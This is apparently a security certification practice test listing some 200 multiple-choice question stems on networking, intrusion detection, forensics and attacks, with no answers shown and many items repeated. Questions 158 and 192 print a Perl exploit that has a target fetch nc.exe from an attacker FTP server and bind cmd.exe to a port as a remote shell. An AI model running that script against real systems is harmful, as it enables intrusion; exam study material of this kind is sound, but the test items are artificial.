EMT Practice Test

1. Question Content...


Question List

Question1: You work as a Network Administrator for Infonet Inc. The company has a Windows Server 2008 domainbased network. The network has three Windows Server 2008 member servers and 150 Windows Vista client computers. According to the company's security policy, you apply Windows firewall setting to the computers on the network. Now, you are troubleshooting a connectivity problem that might be caused by Windows firewall. What will you do to identify connections that Windows firewall allows or blocks?

Question2: John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-secure.com. He wants to send malicious data packets in such a manner that one packet fragment overlaps data from a previous fragment so that he can perform IDS evasion on the We-are- secure server and execute malicious data. Which of the following tools can he use to accomplish the task?

Question3: Which of the following is an example of a firewall?

Question4: You work as a Network Administrator for McRobert Inc. You plan to configure your Windows Vista computer for Internet access. To achieve this, which of the following communication protocols needs to be bound to the dial-up adapter?

Question5: Which of the following IDs is used to reassemble the fragments of a datagram at the destination point?

Question6: Which of the following is the difference between SSL and S-HTTP?

Question7: Which of the following DNS records is used for host name to IPv6 address resolution?

Question8: Ryan, a malicious hacker submits Cross-Site Scripting (XSS) exploit code to the Website of Internet forum for online discussion. When a user visits the infected Web page, code gets automatically executed and Ryan can easily perform acts like account hijacking, history theft etc.
Which of the following types of Cross-Site Scripting attack Ryan intends to do?

Question9: Which of the following hacking tools provides shell access over ICMP?

Question10: Which of the following firewalls depends on the three-way handshake of the TCP protocol?

Question11: What is the name of the group of blocks which contains information used by the operating system in Linux system?

Question12: Which of the following are core TCP/IP protocols that can be implemented with Windows NT to connect computers and internetworks?
Each correct answer represents a complete solution. Choose all that apply.

Question13: A firewall is a combination of hardware and software, used to provide security to a network. It is used to protect an internal network or intranet against unauthorized access from the Internet or other outside networks. It restricts inbound and outbound access and can analyze all traffic between an internal network and the Internet. Users can configure a firewall to pass or block packets from specific IP addresses and ports. Which of the following tools works as a firewall for the Linux 2.4 kernel?

Question14: SSH is a network protocol that allows data to be exchanged between two networks using a secure channel. Which of the following encryption algorithms can be used by the SSH protocol?
Each correct answer represents a complete solution. Choose all that apply.

Question15: Which of the following commands will you use to display ARP packets in the snort-output?

Question16: Which of the following tools can be used to check whether the network interface is in promiscuous mode or not?

Question17: Which of the following utilities can generate a local static route table?
Each correct answer represents a complete solution. Choose two.

Question18: Which of the following commands will you use with the tcpdump command to display the contents of the packets?

Question19: Which of the following IPv6 transition technologies is used by the DirectAccess if a user is in a remote location and a public IPv4 address, instead of public IPv6 address, has been assigned to the computer?

Question20: Which of the following standard file formats is used by Apple's iPod to store contact information?

Question21: Which of the following Web attacks is performed by manipulating codes of programming languages such as SQL, Perl, Java present in the Web pages?

Question22: Which of the following is the process of categorizing attack alerts produced from an IDS in order to distinguish false positives from actual attacks?

Question23: You work as a Network Administrator for Net Perfect Inc. The company has a Windows Server 2008 network environment. The network is configured as a Windows Active Directory-based single forest single domain network. Active Directory integrated zone has been configured on the network. You want to create a text file that lists the resource records of a specified zone for your record. Which of the following commands will you use to accomplish the task?

Question24: Which of the following file systems is designed by Sun Microsystems?

Question25: Andrew works as an Administrator for a Windows 2000 based network. The network has a primary external DNS server, and a secondary DNS server located on the ISP's UNIX server, in order to provide fault tolerance. Users complain that they are unable to connect to the URL when using the secondary server. What should Andrew do to resolve the problem?

Question26: Which of the following utilities is used for decrypting WEP encryption on an 802.11b network?

Question27: You work as a system administrator for BlueSkwer.com. You are using IPv6 on all computers. You want to ensure that you do not need to manually configure the IPv6 addresses. You want to take advantage of the router discovery features. For router discovery to work properly, what is needed?

Question28: John works as a Network Security Administrator for NetPerfect Inc. The manager of the company has told John that the company's phone bill has increased drastically. John suspects that the company's phone system has been cracked by a malicious hacker. Which attack is used by malicious hackers to crack the phone system?

Question29: Which of the following statements are true about routers?
Each correct answer represents a complete solution. Choose all that apply.

Question30: Which of the following ports can be used for IP spoofing?

Question31: Which of the following statements about a host-based intrusion prevention system (HIPS) are true?
Each correct answer represents a complete solution. Choose two.

Question32: John works as a Network Administrator for Samtech Inc. He has configured CDP on each interface of the router. Which of the following commands should he use to list the number of CDP advertisements?

Question33: Peter works as a Technical Representative in a CSIRT for SecureEnet Inc. His team is called to investigate the computer of an employee, who is suspected for classified data theft. Suspect's computer runs on Windows operating system. Peter wants to collect data and evidences for further analysis. He knows that in Windows operating system, the data is searched in pre-defined steps for proper and efficient analysis.
Which of the following is the correct order for searching data on a Windows based system?

Question34: You work as a Network Administrator for Tech Perfect Inc. Your company has a Windows 2000- based network. You want to verify the connectivity of a host in the network. Which of the following utilities will you use?

Question35: Who are the primary victims of smurf attacks on the contemporary Internet system?

Question36: Which of the following software is used for Steganography?

Question37: You work as a Network Administrator for NetTech Inc. The company has a Windows Server 2008 domain- based network. The network contains four Windows Server 2008 member servers and 120 Windows Vista client computers. You are implementing a caching-only DNS server on one of the member servers. Your assistant wants to know about the caching-only DNS server. Which of the following statements about the caching-only DNS server are correct?
Each correct answer represents a complete solution. Choose three.

Question38: Rick works as the Network Administrator of Baby Blue Inc. He wants to upgrade the existing network to the Active Directory based Windows 2000 network.
He configures a DNS on the network. Which of the following is the primary reason that the DNS is required in an Active Directory environment?

Question39: Which of the following is an open-source Web server scanner that tests Web servers for dangerous files/ CGIs, outdated server software?

Question40: Which of the following tools is used to detect round-robin-load-balancing?

Question41: Which of the following is NOT an Intrusion Detection System?

Question42: Which of the following is NOT the functional area of a forensic laboratory?

Question43: Which of the following is a signature-based intrusion detection system (IDS) ?

Question44: Which of the following commands is used to refresh the Master Boot Record (MBR) in MS-DOS?

Question45: Which of the following tools is used to analyze the files produced by several popular packetcapture programs such as tcpdump, WinDump, Wireshark, and EtherPeek?

Question46: You work as a System Administrator for McNeil Inc. The company has a Linux-based network. You are a root user on the Red Hat operating system. Your network is configured for IPv6 IP addressing. Which of the following commands will you use to test TCP/IP connectivity?

Question47: Which of the following tools implements a portable framework in tcpdump for capturing low-level network traffics in UNIX like networks?

Question48: Which of the following is used to provide a protective shield for the data passing over the Internet?

Question49: What is the function of PING LOCALHOST command?

Question50: Which of the following organizations is dedicated to computer security research and information sharing?

Question51: Which of the following is the default port for Hypertext Transfer Protocol (HTTP)?

Question52: What are the benefits of creating a new view using role-based CLI?

Question53: Which of the following tools are used to determine the hop counts of an IP packet?
Each correct answer represents a complete solution. Choose two.

Question54: You work as a Network Administrator for Net Perfect Inc. The company has a TCP/IP-based network.
Users complain of slow traffic on the network. You find that lots of faulty broadcasts are coming from an IP address. You want the Mac address of the source. Which of the following utilities will you use?

Question55: Which of the following monitors program activities and modifies malicious activities on a system?

Question56: John, a novice web user, makes a new E-mail account and keeps his password as "apple", his favorite fruit. John's password is vulnerable to which of the following password cracking attacks?
Each correct answer represents a complete solution. Choose all that apply.

Question57: John, a malicious hacker, forces a router to stop forwarding packets by flooding it with many open connections simultaneously so that all hosts behind it are effectively disabled. Which of the following attacks is John performing?

Question58: John works as a Network Security Professional. He is assigned a project to test the security of www.we- are-secure.com. He is working on the Linux operating system and wants to install an Intrusion Detection System on the We-are-secure server so that he can receive alerts about any hacking attempts. Which of the following tools can John use to accomplish the task?
Each correct answer represents a complete solution. Choose all that apply.

Question59: Which of the following statements about User Datagram Protocol (UDP) is true?

Question60: Adam works as a Security administrator for Umbrella Inc. He runs the following traceroute and notice that hops 19 and 20 both show the same IP address.
1 172.16.1.254 (172.16.1.254) 0.724 ms 3.285 ms 0.613 ms 2 ip68-98-176-
1.nv.nv.cox.net (68.98.176.1) 12.169 ms 14.958 ms 13.416 ms 3 ip68-98-176-
1.nv.nv.cox.net (68.98.176.1) 13.948 ms ip68-100-0-1.nv.nv. cox.net (68.100.0.1)
16.743 ms 16.207 ms 4 ip68-100-0-137.nv.nv.cox.net (68.100.0.137) 17.324 ms 13.933 ms 20.938 ms 5 68.1.1.4 (68.1.1.4) 12.439 ms 220.166 ms 204.170 ms
6 so-6-0-0.gar2.wdc1.Level3.net (67.29.170.1) 16.177 ms 25.943 ms 14.104 ms 7 unknown.Level3.net (209.247.9.173) 14.227 ms 17.553 ms 15.415 ms "PassGuide" -
8 so-0-1-0.bbr1.NewYork1.level3.net (64.159.1.41) 17.063 ms 20.960 ms 19.512 ms 9 so-7-0-0.gar1. NewYork1.Level3.net (64.159.1.182) 20.334 ms 19.440 ms 17.938 ms
10 so-4-0-0.edge1.NewYork1.Level3.
net (209.244.17.74) 27.526 ms 18.317 ms 21.202 ms 11 uunet-level3-
oc48.NewYork1.Level3.net
(209.244.160.12) 21.411 ms 19.133 ms 18.830 ms 12 0.so-6-0-0.XL1.NYC4.ALTER.NET (152.63.21.78)
21.203 ms 22.670 ms 20.111 ms 13 0.so-2-0-0.TL1.NYC8.ALTER.NET (152.63.0.153)
30.929 ms 24.858 ms
23.108 ms 14 0.so-4-1-0.TL1.ATL5.ALTER.NET (152.63.10.129) 37.894 ms 33.244 ms
33.910 ms 15 0.so-7-0-0.XL1.MIA4.ALTER.NET (152.63.86.189) 51.165 ms 49.935 ms
49.466 ms 16 0.so-3-0-0.XR1.MIA4.ALTER.
NET (152.63.101.41) 50.937 ms 49.005 ms 51.055 ms 17 117.ATM6-
0.GW5.MIA1.ALTER.NET (152.63.82.73) 51.897 ms 50.280 ms 53.647 ms 18 passguidegw1.
customer.alter.net (65.195.239.14) 51.921 ms 51.571 ms 56.855 ms 19
www.passguide.com (65.195.239.22) 52.191 ms 52.571 ms 56.855 ms 20
www.passguide.com (65.195.239.22) 53.561 ms 54.121 ms 58.333 ms
Which of the following is the most like cause of this issue?

Question61: What is the maximum size of an IP datagram for Ethernet?

Question62: Which of the following Linux/UNIX commands is used to delete files permanently so that the files cannot be recovered?

Question63: Which of the following can be monitored by using the host-based intrusion detection system (HIDS)?

Question64: Adam works as a Security Administrator for Umbrella. A project has been assigned to him to test the network security of the company. He created a webpage to discuss the progress of the tests with employees who were interested in following the test. Visitors were allowed to click on a company's icon to mark the progress of the test. Adam successfully embeds a keylogger. He also added some statistics on the webpage. The firewall protects the network well and allows strict Internet access.
How was security compromised and how did the firewall respond?

Question65: Which of the following is a hardware/software platform that is designed to analyze, detect, and report on security related events. NIPS is designed to inspect traffic and based on its configuration or security policy, it can drop the malicious traffic?

Question66: Sasha wants to add an entry to your DNS database for your mail server. Which of the following types of resource records will she use to accomplish this?

Question67: Which of the following forensic tool suite is developed for Linux operating system?

Question68: Which of the following methods is a behavior-based IDS detection method?

Question69: John works as a Network Security Administrator for NetPerfect Inc. The manager of the company has told John that the company's phone bill has increased drastically. John suspects that the company's phone system has been cracked by a malicious hacker. Which attack is used by malicious hackers to crack the phone system?

Question70: Which of the following terms is used to represent IPv6 addresses?

Question71: Which of the following statements are true about snort?
Each correct answer represents a complete solution. Choose all that apply.

Question72: Which of the following file systems is designed by Sun Microsystems?

Question73: Which of the following types of scan does not open a full TCP connection?

Question74: You work as a Network Administrator for Infonet Inc. The company has a Windows Server 2008 Active Directory-based single forest multiple domain IPv4 network. All the DNS servers on the network run Windows Server 2008. The users in the network use NetBIOS name to connect network application on the network. Your manager requires you migrate the network to IPv6-enabled network without affecting any client computers. Which of the following actions will you take to accomplish the task?

Question75: Which of the following interfaces is NOT used for connecting a hard disk?

Question76: Which of the following is a valid IP address for class B Networks?

Question77: Which of the following is used over the Internet for better security?

Question78: Which of the following two cryptography methods are used by NTFS Encrypting File System (EFS) to encrypt the data stored on a disk on a file-by-file basis?

Question79: An IDS is a group of processes working together in a network. These processes work on different computers and devices across the network. Which of the following processes does an IDS perform?
Each correct answer represents a complete solution. Choose all that apply.

Question80: Which of the following utilities allows to view all files including invisible files and folders on a Macintosh OS X?

Question81: Which of the following are well-known ports?
Each correct answer represents a complete solution. Choose two.

Question82: Which of the following statements are true about snort?
Each correct answer represents a complete solution. Choose all that apply.

Question83: Which of the following is designed to protect the Internet resolvers (clients) from forged DNS data that are created by the DNS cache poisoning?

Question84: Adam works as a professional Computer Hacking Forensic Investigator. He wants to investigate a suspicious email that is sent using a Microsoft Exchange server. Which of the following files will he review to accomplish the task?
Each correct answer represents a part of the solution. Choose all that apply.

Question85: Which of the following tools allows an attacker to intentionally craft the packets to gain unauthorized access?
Each correct answer represents a complete solution. Choose two.

Question86: Victor is a novice Ethical Hacker. He is learning the hacking process, i.e., the steps taken by malicious hackers to perform hacking. Which of the following steps is NOT included in the hacking process?

Question87: Which of the following attacks is used to hack simple alphabetical passwords?

Question88: In a complex network, Router transfers data packets by observing some form of parameters or metrics provided in the routing table. Which of the following metrics is NOT included in the routing table?

Question89: Session splicing is an IDS evasion technique in which an attacker delivers data in multiple smallsized packets to the target computer. Hence, it becomes very difficult for an IDS to detect the attack signatures of such attacks. Which of the following tools can be used to perform session splicing attacks?
Each correct answer represents a complete solution. Choose all that apply.

Question90: Which of the following is a reason to implement security logging on a DNS server?

Question91: You are planning DNS configuration for your company. You decide to configure an Active Directory integrated DNS.
Which of the following are the benefits of Active Directory integrated DNS configuration?
Each correct answer represents a complete solution. Choose all that apply.

Question92: Which of the following is a valid IPv6 address?

Question93: Which of the following command line tools are available in Helix Live acquisition tool on Windows?
Each correct answer represents a complete solution. Choose all that apply.

Question94: Ryan, a malicious hacker submits Cross-Site Scripting (XSS) exploit code to the Website of Internet forum for online discussion. When a user visits the infected Web page, code gets automatically executed and Ryan can easily perform acts like account hijacking, history theft etc. Which of the following types of Cross- Site Scripting attack Ryan intends to do?

Question95: Which of the following classes refers to the fire involving electricity?

Question96: Which of the following is the default port for TACACS?

Question97: An attacker changes the address of a sub-routine in such a manner that it begins to point to the address of the malicious code. As a result, when the function has been exited, the application can be forced to shift to the malicious code. The image given below explains this phenomenon:

Which of the following tools can be used as a countermeasure to such an attack?

Question98: Which of the following tools allows an attacker to intentionally craft the packets to gain unauthorized access?
Each correct answer represents a complete solution. Choose two.

Question99: Which of the following tools is used to detect spam email without checking the content?

Question100: Computer networks and the Internet are the prime mode of Information transfer today. Which of the following is a technique used for modifying messages, providing Information and Cyber security, and reducing the risk of hacking attacks during communications and message passing over the Internet?

Question101: Sandra, an expert computer user, hears five beeps while booting her computer that has AMI BIOS; and after that her computer stops responding. Sandra knows that during booting process POST produces different beep codes for different types of errors. Which of the following errors refers to this POST beep code?

Question102: You work as a Network Administrator for Tech Perfect Inc. The company has a TCP/IP-based network.
A branch office is connected to the headquarters through a T1 line. Users at the branch office report poor voice quality on the IP phone while communicating with the headquarters. You find that an application, named WorkReport, at the branch office is suffocating bandwidth by sending large packets for file synchronization. You need to improve the voice quality on the IP phone. Which of the following steps will you choose to accomplish this?

Question103: Which of the following IP packet elements is responsible for authentication while using IPSec?

Question104: Which of the following statements are true about an IPv6 network?
Each correct answer represents a complete solution. Choose all that apply.

Question105: Which of the following image file formats uses a lossy data compression technique?

Question106: You work as a Network Administrator for a bank. For securing the bank's network, you configure a firewall and an IDS. In spite of these security measures, intruders are able to attack the network.
After a close investigation, you find that your IDS is not configured properly and hence is unable to generate alarms when needed. What type of response is the IDS giving?

Question107: Which of the following is the default port for File Transport Protocol (FTP)?

Question108: John works as a professional Ethical Hacker. He has been assigned a project to test the security of www.we-are-secure.com. John wants to redirect all TCP port 80 traffic to UDP port 40, so that he can bypass the firewall of the We-are-secure server. Which of the following tools will John use to accomplish his task?

Question109: Peter, a malicious hacker, obtains e-mail addresses by harvesting them from postings, blogs, DNS listings, and Web pages. He then sends large number of unsolicited commercial e-mail (UCE) messages on these addresses. Which of the following e-mail crimes is Peter committing?

Question110: Which of the following is allowed by a company to be addressed directly from the public network and is hardened to screen the rest of its network from security exposure?

Question111: Which of the following commands is a Packet sniffer?

Question112: In which of the following attacks does a hacker imitate a DNS server and obtain the entire DNS database?

Question113: Adam works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate the main server of SecureEnet Inc. The server runs on Debian Linux operating system.
Adam wants to investigate and review the GRUB configuration file of the server system. Which of the following files will Adam investigate to accomplish the task?

Question114: Which of the following files in LILO booting process of Linux operating system stores the location of Kernel on the hard drive?

Question115: What is the order of the extension headers that is followed by IPv6?

Question116: Which of the following units of data does the data-link layer send from the network layer to the physical layer of the OSI model?

Question117: Web applications are accessed by communicating over TCP ports via an IP address. Choose the two most common Web Application TCP ports and their respective protocol names.
Each correct answer represents a complete solution. Choose two.

Question118: You are using a Windows-based sniffer named ASniffer to record the data traffic of a network. You have extracted the following IP Header information of a randomly chosen packet from the sniffer's log:
45 00 00 28 00 00 40 00 29 06 43 CB D2 D3 82 5A 3B 5E AA 72
Which of the following TTL decimal values and protocols are being carried by the IP Header of this packet?

Question119: Choose the proper transport protocol and port number used for Domain Name System. You should be concerned only with DNS lookups.

Question120: Mark has been assigned a project to configure a wireless network for a company. The network should contain a Windows 2003 server and 30 Windows XP client computers. Mark has a single dedicated Internet connection that has to be shared among all the client computers and the server. The configuration needs to be done in a manner that the server should act as a proxy server for the client computers. Which of the following programs can Mark use to fulfill this requirement?

Question121: Which of the following statements about the traceroute utility are true?
Each correct answer represents a complete solution. Choose all that apply.

Question122: Which of the following proxy servers is also referred to as transparent proxies or forced proxies?

Question123: You work as a Network Administrator for Tech Perfect Inc. The company has a TCP/IP-based network.
You want to know the current TCP/IP network configuration settings, DHCP server IP address, and DHCP lease expiration date of your network.
Which of the following utilities will you use?

Question124: Which of the following programs in UNIX is used to identify and fix lost blocks or orphans?

Question125: Which of the following wireless network standards operates on the 5 GHz band and transfers data at a rate of 54 Mbps?

Question126: HOTSPOT
You work as a Network Administrator for McRobert Inc. The company's Windows 2000-based network is configured with Internet Security and Acceleration (ISA) Server 2000. You are configuring intrusion detection on the server. You want to get notified when a TCP SYN packet is sent with a spoofed source IP address and port number that match the destination IP address and port number. Mark the alert that you will enable on the Intrusion Detection tab page of the IP Packet Filters Properties dialog box to accomplish the task.
Hot Area:

Question127: Which of the following attacks is based on the concept that IDSs cannot recognize Unicode encoded malicious data?

Question128: Which of the following parts of hard disk in Mac OS X File system stores information related to the files?

Question129: Which of the following IPv4 to IPv6 transition methods uses encapsulation of IPv6 packets to traverse IPv4 networks?

Question130: Which of the following is known as a message digest?

Question131: What is the size of a subnet in IPv6?

Question132: Which of the following types of firewall functions by creating two different communications, one between the client and the firewall, and the other between the firewall and the end server?

Question133: Which of the following types of cyber stalking damage the reputation of their victim and turn other people against them by setting up their own Websites, blogs or user pages for this purpose?

Question134: In which of the following IDS evasion attacks does an attacker send a data packet such that IDS accepts the data packet but the host computer rejects it?

Question135: Which of the following Denial-of-Service (DoS) attacks employ IP fragmentation mechanism?
Each correct answer represents a complete solution. Choose two.

Question136: Which of the following groups provides tools and creates procedures for testing and validating computer forensic software?

Question137: Which of the following tools can be used to view active telnet sessions?

Question138: Which of the following DoS attacks is a multi-tier attack?

Question139: At which layers of the OSI and TCP/IP models does IP addressing function?

Question140: By gaining full control of router, hackers often acquire full control of the network. Which of the following methods are commonly used to attack Routers?
Each correct answer represents a complete solution. Choose all that apply.

Question141: Which of the following work as traffic monitoring tools in the Linux operating system?
Each correct answer represents a complete solution. Choose all that apply.

Question142: Session splicing is an IDS evasion technique in which an attacker delivers data in multiple smallsized packets to the target computer. Hence, it becomes very difficult for an IDS to detect the attack signatures of such attacks. Which of the following tools can be used to perform session splicing attacks?
Each correct answer represents a complete solution. Choose all that apply.

Question143: Which of the following are not functions of the SNORT application?
Each correct answer represents a complete solution. Choose two.

Question144: Which of the following is the process of categorizing attack alerts produced from IDS?

Question145: Which of the following commands is used to flush the destination cache for IPv6 interface?

Question146: Which of the following attacks is designed to deduce the brand and/or version of an operating system or application?

Question147: This is a Windows-based tool that is used for the detection of wireless LANs using the IEEE 802.11a,
802.11b, and 802.11g standards. The main features of these tools are as follows:
It displays the signal strength of a wireless network, MAC address, SSID, channel details, etc.

It is commonly used for the following purposes:

Question148: For a host to have successful Internet communication, which of the following network protocols are required? You should assume that the users will not manually configure the computer in anyway and that the measure of success will be whether the user can access Web sites after powering the computer and logging on.
Each correct answer represents a complete solution. Choose all that apply.

Question149: John works as a professional Ethical Hacker. He has been assigned a project to test the security of www.we-are-secure.com. John wants to redirect all TCP port 80 traffic to UDP port 40, so that he can bypass the firewall of the We-are-secure server. Which of the following tools will John use to accomplish his task?

Question150: Which of the following tools is used to locate lost files and partitions to restore data from a formatted, damaged, or lost partition in Windows and Apple Macintosh computers?

Question151: Adam works as a professional Computer Hacking Forensic Investigator. He has been assigned with a project to investigate a computer in the network of SecureEnet Inc. The compromised system runs on Windows operating system. Adam decides to use Helix Live for Windows to gather data and electronic evidences starting with retrieving volatile data and transferring it to server component via TCP/IP. Which of the following application software in Helix Windows Live will he use to retrieve volatile data and transfer it to the server component via TCP/IP?

Question152: Which of the following is NOT the primary type of firewall?

Question153: Host-based IDS (HIDS) is an Intrusion Detection System that runs on the system to be monitored. HIDS monitors only the data that it is directed to, or originates from the system on which HIDS is installed.
Besides monitoring network traffic for detecting attacks, it can also monitor other parameters of the system such as running processes, file system access and integrity, and user logins for identifying malicious activities. Which of the following tools are examples of HIDS?
Each correct answer represents a complete solution. Choose all that apply.

Question154: Which of the following commands used in Linux to create bit-stream images?

Question155: Adam works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate a compromised system of a cyber criminal, who hides some information in his computer.
This computer runs on Linux operating system. Adam wants to extract the data units of a file, which is specified by its meta-data address. He is using the Sleuth Kit for this purpose. Which of the following commands in the Sleuth kit will he use to accomplish the task?

Question156: Adam works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate and examine drive image of a compromised system, which is suspected to be used in cyber crime. Adam uses Forensic Sorter to sort the contents of hard drive in different categories. Which of the following type of image formats is NOT supported by Forensic Sorter?

Question157: Which of the following utilities produces the output displayed in the image below?

Question158: Adam, a malicious hacker performs an exploit, which is given below:
#################################################################
$port = 53;
# Spawn cmd.exe on port X
$your = "192.168.1.1";# Your FTP Server 89
$user = "Anonymous";# login as
$pass = '
[email protected]';# password
#################################################################
$host = $ARGV[0];
print "Starting ...\n";
print "Server will download the file nc.exe from $your FTP server.\n"; system("perl msadc.pl -h
$host -C \"echo
open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\""); system ("perl msadc.pl -h
$host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo bin>>sasfile\""); system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host -C \"echo get hacked.
html>>sasfile\""); system("perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print "Server is downloading ...
\n";
system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "Press ENTER when download is finished ...
(Have a ftp server)\n";
$o=; print "Opening ...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n";
#system("telnet $host $port"); exit(0);
Which of the following is the expected result of the above exploit?

Question159: Which of the following types of write blocker device uses one interface for one side and a different one for the other?

Question160: You work as a technician for Net Perfect Inc. You are troubleshooting a connectivity issue on a network.
You are using the ping command to verify the connectivity between two hosts. You want ping to send larger sized packets than the usual 32-byte ones. Which of the following commands will you use?

Question161: Which of the following methods is used by forensic investigators to acquire an image over the network in a secure manner?

Question162: Which of the following are the two different file formats in which Microsoft Outlook saves e-mail messages based on system configuration?
Each correct answer represents a complete solution. Choose two.

Question163: Distributed Checksum Clearinghouse (DCC) is a hash sharing method of spam email detection.
Which of the following protocols does the DCC use?

Question164: Which of the following encryption methods are used by the BlackBerry to provide security to the data stored in it?
Each correct answer represents a complete solution. Choose two.

Question165: You work as a desktop administrator for BlueSkwer.com. You are logged on to a Windows 7 computer with administrator rights. You have run the 'netsh interface IPv6 show interface' command which displays the following:

What is the first interface index used for?

Question166: Adam works as a Security Administrator for Umbrella Inc. A project has been assigned to him to secure access to the network of the company from all possible entry points. He segmented the network into several subnets and installed firewalls all over the network. He has placed very stringent rules on all the firewalls, blocking everything in and out except ports that must be used.
He does need to have port 80 open since his company hosts a website that must be accessed from the Internet. Adam is still worried about programs like Hping2 that can get into a network through covert channels.
Which of the following is the most effective way to protect the network of the company from an attacker using Hping2 to scan his internal network?

Question167: The following output is generated by running the show ip route command:
RouterA#show ip route
< - - Output Omitted for brevity - ->

Which next hop address will RouterA use in forwarding traffic to 10.10.100.0/24?

Question168: Which of the following protocols is used by voice over IP (VoIP) applications?

Question169: Which of the following algorithms is used as a default algorithm for ESP extension header in IPv6?

Question170: Which of the following is the best method of accurately identifying the services running on a victim host?

Question171: You work as a Network Administrator for Net Perfect Inc. The company has a Windows Server2008 network environment. The network is configured as a Windows Active Directory-based single forest single domain network. The network is configured on IP version 6 protocol. All the computers on the network are connected to a switch device. One day, users complain that they are unable to connect to a file server. You try to ping the client computers from the server, but the pinging fails. You try to ping the server's own loopback address, but it fails to ping. You restart the server, but the problem persists.
What is the most likely cause?

Question172: You work as a professional Computer Hacking Forensic Investigator for DataEnet Inc. You want to investigate e-mail information of an employee of the company. The suspected employee is using an online e-mail system such as Hotmail or Yahoo. Which of the following folders on the local computer will you review to accomplish the task?
Each correct answer represents a complete solution. Choose all that apply.

Question173: Which of the following NETSH commands for interface Internet protocol version 4 (IPv4) is used to delete a DNS server or all DNS servers from a list of DNS servers for a specified interface or for all interfaces?

Question174: Adam works as a Security Administrator for Umbrella Inc. A project has been assigned to him to secure access to the network of the company from all possible entry points. He segmented the network into several subnets and installed firewalls all over the network. He has placed very stringent rules on all the firewalls, blocking everything in and out except ports that must be used.
He does need to have port 80 open since his company hosts a website that must be accessed from the Internet. Adam is still worried about programs like Hping2 that can get into a network through covert channels.
Which of the following is the most effective way to protect the network of the company from an attacker using Hping2 to scan his internal network?

Question175: Which of the following algorithms produces a digital signature which is used to authenticate the bit-stream images?

Question176: Adam works as a Senior Programmer for Umbrella Inc. A project has been assigned to him to write a short program to gather user input for a Web application. He wants to keep his program neat and simple. His chooses to use printf(str) where he should have ideally used printf("%s", str).
What attack will his program expose the Web application to?

Question177: Adam works as a professional Computer Hacking Forensic Investigator, a project has been assigned to him to investigate and examine files present on suspect's computer. Adam uses a tool with the help of which he can examine recovered deleted files, fragmented files, and other corrupted data. He can also examine the data, which was captured from the network, and access the physical RAM, and any processes running in virtual memory with the help of this tool. Which of the following tools is Adam using?

Question178: When no anomaly is present in an Intrusion Detection, but an alarm is generated, the response is known as __________.

Question179: An attacker wants to launch an attack on a wired Ethernet. He wants to accomplish the following tasks:
Sniff data frames on a local area network.
Modify the network traffic.
Stop the network traffic frequently.
Which of the following techniques will the attacker use to accomplish the task?

Question180: Which of the following types of Intrusion detection systems (IDS) is used for port mirroring?

Question181: In which of the following IKE phases the IPsec endpoints establish parameters for a secure ISAKMP session?

Question182: John enters a URL http://www.cisco.com/web/learning in the web browser. A web page appears after he enters the URL. Which of the following protocols is used to resolve www.cisco.com into the correct IP address?

Question183: Which of the following is a hardware/software platform that is designed to analyze, detect, and report on security related events. NIPS is designed to inspect traffic and based on its configuration or security policy, it can drop the malicious traffic?

Question184: Adam, an expert computer user, doubts that virus named love.exe has attacked his computer. This virus acquires hidden and read-only attributes, so it is difficult to delete it. Adam decides to delete virus file love.exe from the command line. He wants to use del command for this purpose. Which of the following switches will he use with del command to delete hidden and read only-files?

Question185: Which of the following attacks is also known as the bucket-brigade attack?

Question186: Which of the following sectors on a hard disk contains codes that the computer uses to start the system?

Question187: What is the maximum size of an IP datagram for Ethernet?

Question188: You work as a Network Administrator for McRobert Inc. You want to know the NetBIOS name of your computer. Which of the following commands will you use?

Question189: Which of the following is the correct order of digital investigations Standard Operating Procedure (SOP)?

Question190: Which of the following technologies is used to detect unauthorized attempts to access and manipulate computer systems locally or through the Internet or an intranet?

Question191: Which system is designed to analyze, detect, and report on security-related events?

Question192: Adam, a malicious hacker performs an exploit, which is given below:
#################################################################
$port = 53;
# Spawn cmd.exe on port X
$your = "192.168.1.1";# Your FTP Server 89
$user = "Anonymous";# login as
$pass = '
[email protected]';# password
#################################################################
$host = $ARGV[0];
print "Starting ...\n";
print "Server will download the file nc.exe from $your FTP server.\n"; system("perl msadc.pl -h $host -C \"echo open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\""); system("perl msadc.pl -h
$host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo bin>>sasfile\""); system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host -C
\"echo get hacked.
html>>sasfile\""); system("perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print
"Server is downloading ...
\n";
system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "Press ENTER when download is finished ...
(Have a ftp server)\n";
$o=; print "Opening ...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n";
#system("telnet $host $port"); exit(0);
Which of the following is the expected result of the above exploit?

Question193: Which of the following intrusion detection systems (IDS) produces the false alarm because of the abnormal behavior of users and network?

Question194: Which of the following statements best describes the string matching method of signature analysis?

Question195: Which of the following tools is used to recover data and partitions, and can run on Windows, Linux, SunOS, and Macintosh OS X operating systems?

Question196: Which of the following is a technique of attacks in which the attacker secretly listens to the private conversation between victims?

Question197: Mark works as a Network Security Administrator for BlueWells Inc. The company has a Windowsbased network. Mark is giving a presentation on Network security threats to the newly recruited employees of the company. His presentation is about the External threats that the company recently faced in the past. Which of the following statements are true about external threats?
Each correct answer represents a complete solution. Choose three.

Question198: Which of the following is a correct sequence of different layers of Open System Interconnection (OSI) model?

Question199: Which of the following snort keywords is used to match a defined payload value?

Question200: Users on a TCP/IP network are able to ping resources using IP addresses. However, they are unable to connect to those resources through their host names. A malfunction or failure of which of the following servers may be the cause of the issue?

Question201: Which of the following tools is used to analyze a system and report any unsigned drivers found?

Question202: You work as a Network Administrator of a TCP/IP network. You are having DNS resolution problem. Which of the following utilities will you use to diagnose the problem?

Question203: Peter works as a System Administrator for TechSoft Inc. The company uses Linux-based systems.
